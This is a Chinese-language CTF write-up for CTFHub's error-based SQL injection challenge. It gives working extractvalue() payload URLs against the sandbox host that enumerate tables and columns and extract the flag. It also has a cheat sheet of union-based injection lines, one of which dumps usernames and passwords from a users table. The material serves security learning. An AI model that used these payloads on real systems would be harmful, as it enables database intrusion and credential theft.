CTFHub:web前置技能-SQL注入-报错注入

CTFHub个人学习记录

第三章：web前置技能-SQL注入-报错注入

---

---

前言

路漫漫其修远兮，吾将上下而求索。
本文涉及以下知识点，去引用文章学习即可：
链接: 我是一个知识点
链接: 我是一个知识点
链接: 我是一个知识点
文章总结有我个人总结的一些知识点，希望对你有所帮助。
练习sql注入，推荐使用sql-labs这个靶场，我后续也会更新从开始搭建到攻略1-75关完整教程，早些关注上车哦。

---

一、解题过程

此题有多种报错解法，我这里图方便使用extractvalue()报错方法做演示：

1.访问靶机，跟提示输入1，结果如下图所示：

2.查看当前数据库下所有的表，使用limit控制结果数量，发现flag表，如下图所示：

使用命令：

http://challenge-1b9a7e7411ccb247.sandbox.ctfhub.com:10800/?id=1 union select 1,extractvalue(1,concat(0x7e,(select (table_name) from information_schema.tables where table_schema=database()limit 1,1),0x7e))#

3.查看当前数据表flag下所有的字段，使用limit控制结果数量，发现flag字段，如下图所示：

使用命令：

http://challenge-1b9a7e7411ccb247.sandbox.ctfhub.com:10800/?id=-1 union select 1,extractvalue(1,concat(0x7e,(select (column_name) from information_schema.columns where table_name=0x666c6167),0x7e))#

4.查看flag字段数据信息，发现flag提交即可，如下图所示：

使用命令：

http://challenge-1b9a7e7411ccb247.sandbox.ctfhub.com:10800/?id=-1 union select 1,extractvalue(1,(select flag from flag))#

5.这里可以使用mid函数来截取字段信息，先查看前16个字符信息，如下图所示：

使用命令：

http://challenge-1b9a7e7411ccb247.sandbox.ctfhub.com:10800/?id=-1 union select 1,extractvalue(1,concat(0x7e,mid((select flag from flag),1,16),0x7e))#

6.再查看从17字符开始后的所有字符信息，如下图所示

使用命令：

http://challenge-1b9a7e7411ccb247.sandbox.ctfhub.com:10800/?id=-1 union select 1,extractvalue(1,concat(0x7e,mid((select flag from flag),17),0x7e))#

7.最后拼接提交flag即可

sql注入基本语句
判断有多少列：

order by 4 -- -

判断数据显示点：

union select 1,2,3 -- -

显示出登录用户和数据库名：

union select 1,user(),database()­­ -- -

­查看数据库有哪些表：

union select 1,(select group_concat(table_name) from information_schema.tables where table_schema = 'security' ),3 -- -

查看对应表有哪些列：

union select 1,(select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name='users' ),3 -- -

查看账号密码信息：

union select 1,(select group_concat(concat_ws(0x7e,username,password))from users),3 -- -

---

总结

思路：
基于报错的SQL盲注 - 报错回显（强制性报错 ）
updatexml():从目标XML中更改包含所查询值的字符串
extractvalue():从目标XML中返回包含所查询值的字符串

SQL注入之floor报错原理
floor()报错注入的原因是group by在向临时表插入数据时，由于rand()多次计算导致插入临时表时主键重复，从而报错，又因为报错前concant()中的SQL语句或者函数被执行，所以改语句报错而且被抛出的主键是SQL语句或数执行后的结果。